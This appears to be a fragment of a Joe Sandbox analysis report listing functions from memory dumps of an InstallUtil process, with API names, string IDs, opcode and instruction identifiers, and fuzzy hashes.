                                                                                • Opcode ID: 0c42bda0be21825ad41a94254d9620ab0c799294dca3e10b20a2dd4fb53496af
                                                                                • Instruction ID: d6dcd34236613bd75b0753c16c9298279d2091f56db99605f2aa18666672acca
                                                                                • Opcode Fuzzy Hash: 0c42bda0be21825ad41a94254d9620ab0c799294dca3e10b20a2dd4fb53496af
                                                                                • Instruction Fuzzy Hash: AC21897490020CCFCB14DF9AD449BAEBBF5EB88320F108019E856AB381C775AA44CFA5
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(00000000,00000000,05678F9C,?,00000000,056903F4,00000000,?,?,?,?), ref: 0569C74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 08598aa1acb812a7649436df55f1c929808e3edfa82f6d7302de4ae2902026f3
                                                                                • Instruction ID: 13d6c8f1439b05f75aabd1048186675a90ce1e73a90f7532aa956d34546771f0
                                                                                • Opcode Fuzzy Hash: 08598aa1acb812a7649436df55f1c929808e3edfa82f6d7302de4ae2902026f3
                                                                                • Instruction Fuzzy Hash: D821DFB9D002499FDB10CFA9D984AEEBBF4FB48310F14841AE918A7350D378A951CF65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q
                                                                                • API String ID: 0-2414175341
                                                                                • Opcode ID: d5409d8a64950d7a5e8e00c801cabd0f970e3d48cf746c3ce692c7bfac3012cc
                                                                                • Instruction ID: 19b43f8a806d56e01a4b1471dee32ca6ca6a955907093c2cd4c7b7d0b2276c94
                                                                                • Opcode Fuzzy Hash: d5409d8a64950d7a5e8e00c801cabd0f970e3d48cf746c3ce692c7bfac3012cc
                                                                                • Instruction Fuzzy Hash: 54C1D2B0E0425A8FDB15CF68C4809BEBBB2FF85214F5485AAE5599B352D730EC42CB90
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 0569C83D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 48b33b4f1afd7fe4c6cf74428fc4565c786fa59e753e53009ebab93cb53c7ab1
                                                                                • Instruction ID: e0071cfa488589362773a0decc60bad52c7e7dcd9c5e43a8d32eb0f1c15e53fc
                                                                                • Opcode Fuzzy Hash: 48b33b4f1afd7fe4c6cf74428fc4565c786fa59e753e53009ebab93cb53c7ab1
                                                                                • Instruction Fuzzy Hash: E91189B19003488FEF28CF98C2457EABBF4AF48318F10485ED45AA7710C7B9A945CB90
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00A5D474
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1451503339.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_a50000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 8a75b7b2ad665a1caa548df6498fcf1d3bfb3ee78b702a6833cf275244263f92
                                                                                • Instruction ID: 2bf25e7a745a27d761149d5e965350bc2ce4f0f317f133a1d3200f9efe535083
                                                                                • Opcode Fuzzy Hash: 8a75b7b2ad665a1caa548df6498fcf1d3bfb3ee78b702a6833cf275244263f92
                                                                                • Instruction Fuzzy Hash: EC11E3B1D002089FDB24DFAAC884B9EFBF5FF48310F14842AE459A7650C779A9458FA5
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 0569C83D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 617a9bdb8262b8032c1914a3c7948efd7ffb6515170cb03ba8305c51a09ea2a3
                                                                                • Instruction ID: 44e1f9843c096afba933b8f0c49a56c75cdab6da1f8b1f06d2bd861c3995a349
                                                                                • Opcode Fuzzy Hash: 617a9bdb8262b8032c1914a3c7948efd7ffb6515170cb03ba8305c51a09ea2a3
                                                                                • Instruction Fuzzy Hash: 2E1155B1C043488FEB20DFAAD484BDEBBF8EB48214F20845AD519AB210C374A945CFA5
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 0569C83D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 22c74c6df66155a42400c9baba1a7a3eee20f31173c4aec97f804d8e185f1db2
                                                                                • Instruction ID: 9d482e66e95c2f4a1baa6eaaa2211faf74b60868bcab5387ba7909ed6dec452e
                                                                                • Opcode Fuzzy Hash: 22c74c6df66155a42400c9baba1a7a3eee20f31173c4aec97f804d8e185f1db2
                                                                                • Instruction Fuzzy Hash: D31145B5C00348CFDB20DF9AD484BDEBBF8EB48214F10845AE519A7300C374A941CFA5
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 0569C83D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 8b02ce8cda0e96ae0068cfeeeb4dc4929aec56920c0da04f58a86d2eb717983f
                                                                                • Instruction ID: 71b33bd5a58a55f2e4a77a1aa8a45900c84437c463624984e198a8a5feb59755
                                                                                • Opcode Fuzzy Hash: 8b02ce8cda0e96ae0068cfeeeb4dc4929aec56920c0da04f58a86d2eb717983f
                                                                                • Instruction Fuzzy Hash: 171130B5C003488FDB20CFA9C584BCEBBF4AB08214F20845AD559A7310C378A941CFA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q
                                                                                • API String ID: 0-2414175341
                                                                                • Opcode ID: 285bcb3582e13fab6443e2100056e615ad03921f30fb24b7e5399bc243ca59c6
                                                                                • Instruction ID: 732e462b3725d5f6b2281156c11a8cc5db33afca30a79d6b50b628bd02cf9e02
                                                                                • Opcode Fuzzy Hash: 285bcb3582e13fab6443e2100056e615ad03921f30fb24b7e5399bc243ca59c6
                                                                                • Instruction Fuzzy Hash: 82A190357042009FD7169F68D894E6A7BB3FF89310B1585A9E6058F7B2CB32EC42DB90
                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0668D211
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522207426.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6680000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 5574259c096ce2bea7992b1c265cfbf0fb6c0477187cbc3197ef7924f738fac4
                                                                                • Instruction ID: c82b502b559ce42c90c7a1e263c7b665f7ce3a69b2344b534375d730f37bcba9
                                                                                • Opcode Fuzzy Hash: 5574259c096ce2bea7992b1c265cfbf0fb6c0477187cbc3197ef7924f738fac4
                                                                                • Instruction Fuzzy Hash: 2ED0A7780093C46FC702CA60DB219D37F60BE5211870900DBF4454F153C7244726EB21
                                                                                APIs
                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0668D211
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522207426.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6680000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DispatcherExceptionUser
                                                                                • String ID:
                                                                                • API String ID: 6842923-0
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Dq
                                                                                • API String ID: 0-144822681
                                                                                • Opcode ID: 675e2f52b2142b61f916e7b813c6dfe53d4742ab3a94ec9d1ea838416d179d8c
                                                                                • Instruction ID: 9cfe682cb823582380e61044ddc5c378691b5d965b3a128daadaf04e3a37017b
                                                                                • Opcode Fuzzy Hash: 675e2f52b2142b61f916e7b813c6dfe53d4742ab3a94ec9d1ea838416d179d8c
                                                                                • Instruction Fuzzy Hash: 48A17E75B006009FC724EF69E594B9ABBF2FF8A710F158169E4059B3A5DB31EC06CB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PHq
                                                                                • API String ID: 0-3820536768
                                                                                • Opcode ID: 7cd21ccd04f386c785653d5e98569f8d47b12c933302231acbabb73b9ed368dc
                                                                                • Instruction ID: 45fa0f437bd3882e1bd650ef10c6ef62abda29b20e15131fa11e76712d8b803b
                                                                                • Opcode Fuzzy Hash: 7cd21ccd04f386c785653d5e98569f8d47b12c933302231acbabb73b9ed368dc
                                                                                • Instruction Fuzzy Hash: BE919430B102149FDB95FB75E85467EB7F2AF88300B5181A9DD069B398DF70AD02CB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q
                                                                                • API String ID: 0-1807707664
                                                                                • Opcode ID: b41b2804d9b40450ceffc212c96aa152d78c779db362d3a622a9bc8851148222
                                                                                • Instruction ID: 5c234ca55060388a43b693996ed045fed7b48c2e6abdb4789dbb617c2393d14a
                                                                                • Opcode Fuzzy Hash: b41b2804d9b40450ceffc212c96aa152d78c779db362d3a622a9bc8851148222
                                                                                • Instruction Fuzzy Hash: AA814D35B002189FDB15DFA4D595AEDB7F6BF88710F2484A9E906AB3A1CB31ED01CB50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Dq
                                                                                • API String ID: 0-144822681
                                                                                • Opcode ID: 4bc6a5f8c4e4daca85a9f044b9701f245102f28875297433ee39d65947fc318d
                                                                                • Instruction ID: 5a6ca37f54a2e6a7a847bf592b4717e85096b71389804a0e4ae41e0210684679
                                                                                • Opcode Fuzzy Hash: 4bc6a5f8c4e4daca85a9f044b9701f245102f28875297433ee39d65947fc318d
                                                                                • Instruction Fuzzy Hash: 80715B75A016009FC724EF2AE584A99BBF2FF89310B158169E8169B375DB31EC46CF90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: pq
                                                                                • API String ID: 0-153521182
                                                                                • Opcode ID: f30e807d38fb4a0c2e759f1edc098744c07d3a148b958a045d836154663d9c8a
                                                                                • Instruction ID: b9646215a73e807cc2f2b5d436f5a9a84a6bc37efa898fdbbf340dde6ce0891a
                                                                                • Opcode Fuzzy Hash: f30e807d38fb4a0c2e759f1edc098744c07d3a148b958a045d836154663d9c8a
                                                                                • Instruction Fuzzy Hash: BD516E76600104AFDB459FA8DC45D5ABBB3FF8D31471A8098E2099B372DB32DC22EB50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Teq
                                                                                • API String ID: 0-1098410595
                                                                                • Opcode ID: 0ee726e259c5ece0c48c86fd64643f0cb8ba7efe5d17fd1a23a765b4e5db470d
                                                                                • Instruction ID: 8fc0d743113864f4a8e1afc75f8a7f23ca5697d241cd0f3bed971e92c7b8e561
                                                                                • Opcode Fuzzy Hash: 0ee726e259c5ece0c48c86fd64643f0cb8ba7efe5d17fd1a23a765b4e5db470d
                                                                                • Instruction Fuzzy Hash: 1F51D272B00204CFE714DB26F449BADB7B7FB89304F598439D8069BAA9CB745887CB54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: t
                                                                                • API String ID: 0-2238339752
                                                                                • Opcode ID: ade106a2b40ec5aff5b5274ea85720ae9fbcd639ab380908f1148866f53573b9
                                                                                • Instruction ID: 14192e98d2e19e9384db8a6b3da8b5f0cecccaf9f5f77e5e331d7d855f869867
                                                                                • Opcode Fuzzy Hash: ade106a2b40ec5aff5b5274ea85720ae9fbcd639ab380908f1148866f53573b9
                                                                                • Instruction Fuzzy Hash: F2518534A00205CFD786EB64E454B7AB3B3EB84304F15D1ADD9098B399DFB59D41CB82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q
                                                                                • API String ID: 0-1807707664
                                                                                • Opcode ID: 8e7f2ae0e1d9519491212233f09022248dd40fd64ff7a6eeb3a0f2c105c1fc7c
                                                                                • Instruction ID: dd7af81d29ae3949b59884f08b877b378b73fb7a370c4feab9b117bf25162506
                                                                                • Opcode Fuzzy Hash: 8e7f2ae0e1d9519491212233f09022248dd40fd64ff7a6eeb3a0f2c105c1fc7c
                                                                                • Instruction Fuzzy Hash: EA41B430B106148FDB14BB65D454AAEB7BBAFC9704F10482EE506EB3A4CF70AC06DB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q
                                                                                • API String ID: 0-2414175341
                                                                                • Opcode ID: 05e95f95a1bae1d91e2fc4afbb3047ae91262795c4443689f6be12168bde30f0
                                                                                • Instruction ID: f7aab525115833320ae3b5303a8472da239192482cec268b1602a7dcc93b7cb3
                                                                                • Opcode Fuzzy Hash: 05e95f95a1bae1d91e2fc4afbb3047ae91262795c4443689f6be12168bde30f0
                                                                                • Instruction Fuzzy Hash: 5B41C035A006169FCB10CF18C484AAAF7B2FF89321B558699D829AB381D734FD52CBC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PHq
                                                                                • API String ID: 0-3820536768
                                                                                • Opcode ID: d74cc7e6eb5efda9703ef929b856674b78f55d5e91f595757de4342b5d57d1d0
                                                                                • Instruction ID: edc42b3aad492b7a25eea50d02cfdd996c590162d191faea7b8c5a6f4ab1114a
                                                                                • Opcode Fuzzy Hash: d74cc7e6eb5efda9703ef929b856674b78f55d5e91f595757de4342b5d57d1d0
                                                                                • Instruction Fuzzy Hash: F4414B34604114CFE799DF65E0597AA77F2EB84704F26D0A9D9069B38CCFB89C82CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJq
                                                                                • API String ID: 0-48878262
                                                                                • Opcode ID: 2a08b946877b7933b66206dcecd7aa66fa9a2a5c4d64f0a84393eedff5e83861
                                                                                • Instruction ID: 1bd16cdeeabab8939c22845e4fce3f7609706f19c62ba6c5d1e44daf3fd9a243
                                                                                • Opcode Fuzzy Hash: 2a08b946877b7933b66206dcecd7aa66fa9a2a5c4d64f0a84393eedff5e83861
                                                                                • Instruction Fuzzy Hash: E73108353002109FDB15ABB4E558B2E77F7FB89301F054569E84ACB7A1DB34DC068792
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJq
                                                                                • API String ID: 0-48878262
                                                                                • Opcode ID: 48afc0209a72265501905189f36dc430b16946299e1fb975f46b52852a0fb381
                                                                                • Instruction ID: d2cae5c89fd172b2bd326e5402425a27b4800d843cd11c3f8e96a69140fb78e1
                                                                                • Opcode Fuzzy Hash: 48afc0209a72265501905189f36dc430b16946299e1fb975f46b52852a0fb381
                                                                                • Instruction Fuzzy Hash: 123107353042109FDB25AB74E958B2F7BF7EB89300F091569E84BCB7A1DA34CC059792
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q
                                                                                • API String ID: 0-1807707664
                                                                                • Opcode ID: afe6f4ec3b9764bdf8e19d15aa7d1fc5f59904c780d655a5f0c532de2e49ca7e
                                                                                • Instruction ID: bcd345a0b6c8d3df2d5522d975832b8b718fff27e77a5f1938b6ac2aee8dd51e
                                                                                • Opcode Fuzzy Hash: afe6f4ec3b9764bdf8e19d15aa7d1fc5f59904c780d655a5f0c532de2e49ca7e
                                                                                • Instruction Fuzzy Hash: B5318235B401049FCF16DF55D854A9ABBB7EF8C310B0544A9EA099B371DA31EC16CBA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJq
                                                                                • API String ID: 0-48878262
                                                                                • Opcode ID: 785da5d85697586dc8d735f7b73059fd8ff0e99e18f054182483d951527e0288
                                                                                • Instruction ID: c43740d217bbfb4ac0903b93066e4d6dca339e8f15aa2f127c39666d5650c1fe
                                                                                • Opcode Fuzzy Hash: 785da5d85697586dc8d735f7b73059fd8ff0e99e18f054182483d951527e0288
                                                                                • Instruction Fuzzy Hash: C23105353002109FEB25ABB4E458B2E76F7EB88310F051269E94BCB7A1DA74DC058792
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q
                                                                                • API String ID: 0-1301096350
                                                                                • Opcode ID: 3d2896fa0c8e0312df649ae5ca39404c4aa80a17c72410b3739f86a82fb07aac
                                                                                • Instruction ID: 612ef1472f3e4ec82bec6806e2e77b4c09e3e58d8d4db12a176670afbfbb5794
                                                                                • Opcode Fuzzy Hash: 3d2896fa0c8e0312df649ae5ca39404c4aa80a17c72410b3739f86a82fb07aac
                                                                                • Instruction Fuzzy Hash: 1031AE34B10200CFE7A5EB65E468B7DB3E2EF89300F55C169DA068B399DF70A845CB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PHq
                                                                                • API String ID: 0-3820536768
                                                                                • Opcode ID: 5c66c78a4bcf60144f5f6fc40bd6e11d6ef8083f7f2a5493a071d7e01f0752a7
                                                                                • Instruction ID: 51c3d994a0f1f25d71aca628f15d4c8a5ed5a0080addd0b1c0204c3c7f71efb5
                                                                                • Opcode Fuzzy Hash: 5c66c78a4bcf60144f5f6fc40bd6e11d6ef8083f7f2a5493a071d7e01f0752a7
                                                                                • Instruction Fuzzy Hash: 98314134A15204CFF7D9DA21D954B6A73A2FB81304F56D1E5CD068B298DBB1AC42CB82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q
                                                                                • API String ID: 0-1807707664
                                                                                • Opcode ID: 008a2b04675201f94533a290633d5739b3c7373c39d2a23a62e5c2f93a85c221
                                                                                • Instruction ID: 45ea58b6c8a6cbb93cac187859566513ae1aaa71817b81fef75767cce5d5f273
                                                                                • Opcode Fuzzy Hash: 008a2b04675201f94533a290633d5739b3c7373c39d2a23a62e5c2f93a85c221
                                                                                • Instruction Fuzzy Hash: D3218330B102149BDB14AF65D86977EB7AFAFC8700F10442EE106EB390CE706C06DB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $q
                                                                                • API String ID: 0-1301096350
                                                                                • Opcode ID: 3acdafca07cff7c9bd8b6c18196a34b48490e65a7d95f59711e9ee9456756f91
                                                                                • Instruction ID: 2e06c1bcee95c70933f6af4a1371b9989410108203da59ad7acf2b18a9d05924
                                                                                • Opcode Fuzzy Hash: 3acdafca07cff7c9bd8b6c18196a34b48490e65a7d95f59711e9ee9456756f91
                                                                                • Instruction Fuzzy Hash: 3521F630B10220CFE395A664E814736B3E2F780344FA6C1E9E9058B6BADBF5DC55C785
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p<q
                                                                                • API String ID: 0-3896934649
                                                                                • Opcode ID: 8fcfd570999d84d220fb086216f9ff7c4e765d18fb19635327b1cb1ca10b0c0e
                                                                                • Instruction ID: fa6c57d86d4ef5ba98f3789851cc6e4a398014a99753d9cbe8ce57a30bceb20c
                                                                                • Opcode Fuzzy Hash: 8fcfd570999d84d220fb086216f9ff7c4e765d18fb19635327b1cb1ca10b0c0e
                                                                                • Instruction Fuzzy Hash: F421AC713042949FDB02CF2AC891EAA7BF6AF8A301B194095F845CB361CA71ED52CB60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p<q
                                                                                • API String ID: 0-3896934649
                                                                                • Opcode ID: f0553abb81ccaa467f239dffb446d2a489a7fb09bc1504f2c4293103983f2899
                                                                                • Instruction ID: a1bcdc98f3b5fc5da781af6fdc5617670c13ee08c3e884dfe4b5732c059756ac
                                                                                • Opcode Fuzzy Hash: f0553abb81ccaa467f239dffb446d2a489a7fb09bc1504f2c4293103983f2899
                                                                                • Instruction Fuzzy Hash: 8B2179B13042549FDB01CF2AC840AAA7BEAAF8A301B1840A5FC49CB361CB75ED50DB60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: [A<?
                                                                                • API String ID: 0-2307253386
                                                                                • Opcode ID: b08e7a4717a8091946e466edc9a7e9bd9195e3961a386c62d9b36ffada57f1b9
                                                                                • Instruction ID: a078eae29e6eea328a7dcefd35371454ad0ce2fc06a4dff31fa6d97fe8f62f45
                                                                                • Opcode Fuzzy Hash: b08e7a4717a8091946e466edc9a7e9bd9195e3961a386c62d9b36ffada57f1b9
                                                                                • Instruction Fuzzy Hash: 3B113D34A102158FD759DB74D85ABAABBF1FF49344F0180A9980ADB265DE349D42CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6
                                                                                • API String ID: 0-498629140
                                                                                • Opcode ID: fea46b3b012c6b49e3f687c96dea8d4e2f8e5ddd1e5b86f235354e6ce52f1548
                                                                                • Instruction ID: b71e04d7ee4565d4211958f637c58609d9b0c5623a55f8457175206cbf966e48
                                                                                • Opcode Fuzzy Hash: fea46b3b012c6b49e3f687c96dea8d4e2f8e5ddd1e5b86f235354e6ce52f1548
